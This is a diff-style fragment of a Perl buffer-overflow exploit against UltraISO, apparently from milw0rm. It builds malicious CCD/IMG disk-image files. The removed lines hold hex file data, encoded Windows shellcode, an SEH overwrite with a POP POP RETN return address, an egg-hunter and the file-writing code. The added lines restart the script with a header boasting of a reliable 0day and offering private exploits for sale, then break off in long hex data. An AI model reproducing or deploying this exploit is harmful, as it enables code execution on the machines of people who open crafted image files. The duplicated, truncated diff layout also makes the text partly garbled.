- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\xB3\x61\xEB\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\xF7\x22\xF5\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6C\xC8\xA3\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x11\xF4\x3F\x3F". - "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x48\x7B\xC2\xCB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF7\x9A\xBE\xBB\x20\x31\x69\x10\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x1B\xCB\xCB\x52\x52\xA4\xA4\xC5\x2D". - "\xA6\xAC\x45\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x71\x39\x28\x8E\x32". - "\x21\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x65\x65\x8A\x8A\x52\x52\xA4\xA4\x99\xA6\xF6\xEE\x76\x12"; -my $ccd_data = "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F". - "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63". - "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B". - "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70". 
- "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F". - "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34". - "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72". - "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31". - "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B". - "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D". - "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F". - "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C". - "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D". - "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D". - "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31". - "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D". - "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A". - "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33". 
- "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31". - "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D". - "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D". - "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D". - "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A". - "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39"; - -# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x68". -"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x78\x32\x42\x42\x32\x41". -"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6d\x39\x6b\x4c\x6a". -"\x48\x31\x54\x53\x30\x55\x50\x77\x70\x4c\x4b\x30\x45\x45\x6c\x4e". -"\x6b\x71\x6c\x46\x65\x32\x58\x43\x31\x38\x6f\x4c\x4b\x62\x6f\x56". -"\x78\x6c\x4b\x41\x4f\x41\x30\x45\x51\x7a\x4b\x37\x39\x6e\x6b\x74". -"\x74\x4c\x4b\x34\x41\x38\x6e\x30\x31\x39\x50\x4f\x69\x6e\x4c\x4b". -"\x34\x6b\x70\x53\x44\x66\x67\x4b\x71\x58\x4a\x34\x4d\x54\x41\x39". -"\x52\x38\x6b\x6c\x34\x57\x4b\x32\x74\x41\x34\x34\x44\x74\x35\x7a". -"\x45\x4c\x4b\x41\x4f\x41\x34\x44\x41\x6a\x4b\x61\x76\x4e\x6b\x36". -"\x6c\x70\x4b\x4c\x4b\x43\x6f\x57\x6c\x63\x31\x58\x6b\x6e\x6b\x37". -"\x6c\x6e\x6b\x66\x61\x38\x6b\x4c\x49\x31\x4c\x66\x44\x76\x64\x4b". -"\x73\x47\x41\x59\x50\x50\x64\x4e\x6b\x77\x30\x30\x30\x4c\x45\x4b". -"\x70\x70\x78\x44\x4c\x6c\x4b\x73\x70\x56\x6c\x6e\x6b\x72\x50\x47". 
-"\x6c\x4c\x6d\x4c\x4b\x62\x48\x43\x38\x5a\x4b\x74\x49\x4c\x4b\x4f". -"\x70\x6e\x50\x47\x70\x37\x70\x75\x50\x6e\x6b\x41\x78\x45\x6c\x31". -"\x4f\x37\x41\x4c\x36\x61\x70\x36\x36\x4e\x69\x7a\x58\x4b\x33\x6b". -"\x70\x63\x4b\x56\x30\x61\x78\x31\x6e\x4e\x38\x6d\x32\x72\x53\x55". -"\x38\x4d\x48\x6b\x4e\x4e\x6a\x76\x6e\x32\x77\x59\x6f\x69\x77\x50". -"\x63\x50\x61\x30\x6c\x65\x33\x56\x4e\x63\x55\x32\x58\x32\x45\x35". -"\x50\x68"; - - -my $overflow1 = "\x41" x 10002; -my $lookout = "\x41" x 128; -my $sehjmp = "\xEB\x80\xFF\xFF"; -my $sehret = "\x56\x38\x40\x00"; # 00403856 POP POP RETN -my $shellhunter = "\x8b\xcc". - "\xb8\x41\x41\x41\x41". - "\x41". - "\x36\x39\x01". - "\x75\xf5". - "\xff\xd1"; -my $len1 = 4091 - (length($shellcode) + 128 + 126) + 972; #Remove "+ 972" if you want the exploit to work if the CCD or IMG file are executed when passed as parameters to UltraISO. -my $len2 = 126 - length($shellhunter); -my $overflow2 = "\x42" x $len1; -my $overflow3 = "\x41" x $len2; -my $overflow4 = "\x43" x 5903; - -open (my $img_file, "> s.img"); #Important: IMG filename must be same as CCD filename. -binmode $img_file; -print $img_file $img_data1. - $overflow1. - $img_data2. - $overflow1. - $img_data3. - $overflow1. - $img_data4; -close $img_file; -open (my $ccd_file, "> s.ccd"); -print $ccd_file $ccd_data. - $lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4; -close $ccd_file; - -# milw0rm.com [2009-04-03] +#!/usr/bin/perl +# +# UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit +# ---------------------------------------------------------------- +# Discovered and Exploited by SkD (skdrat@hotmail.com) +# +# A nice exploit for this software that was just recently +# patched after a few other discoveries in it. +# This is 0day at the moment and is very reliable. +# +# Just open either file CCD or IMG in UltraISO :). +# +# Another note is that the CCD will also cause an access violation +# in MagicISO. 
+# +# Private exploits for sale, contact me at (skdrat@hotmail.com). +# +# WARNING: Author has no responsibility over the damage done +# with this! +use strict; +use warnings; + +my $img_data1 = "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC5\x13\x68\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x00\xF5". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x52\x35\xB8\x7D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x97\x26\xD0\x56". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2D\x17". + "\x2E\x1B\xB1\x48\xB2\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x65\x00\xC2\x00\xE6\x00\x43\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x3C\x53\x75\x33\x2B\x25\x62\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00\xC1\x00\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x01\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 